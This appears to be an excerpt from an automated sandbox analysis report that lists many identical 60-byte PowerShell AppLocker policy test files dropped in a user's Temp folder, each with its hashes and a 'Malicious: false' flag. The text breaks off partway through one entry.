Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2c3flwhf.ntm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2iya51hv.lms.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2u24cro4.1l2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cv5o2fi.of2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ntf4p14.zf1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wrczkp0.kwl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dvcegqu.cwk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rvzzqqn.ygw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahkfhasf.wuy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdgyspak.1bv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhvt4fkk.krc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5emvnkt.5ht.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cckmfwrm.fma.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdubgnd4.40s.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cz1gpddz.gpq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3kjvuut.ner.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlyyxjhk.wft.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzygupga.wja.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ekatcaam.41u.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eo2zaids.5ww.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esr1x3mq.2bq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fa0cjny4.bf5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdlqm5wz.45e.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fejwdbth.ief.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhpvjyb4.eg5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fyxi5o0s.zjl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5jlshgr.5t0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ho5g4kxj.h53.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htktm1qn.ua0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzhrcghf.pxt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzjq0bh5.3v3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i42bymo1.x1u.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_im53u0aw.l1p.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
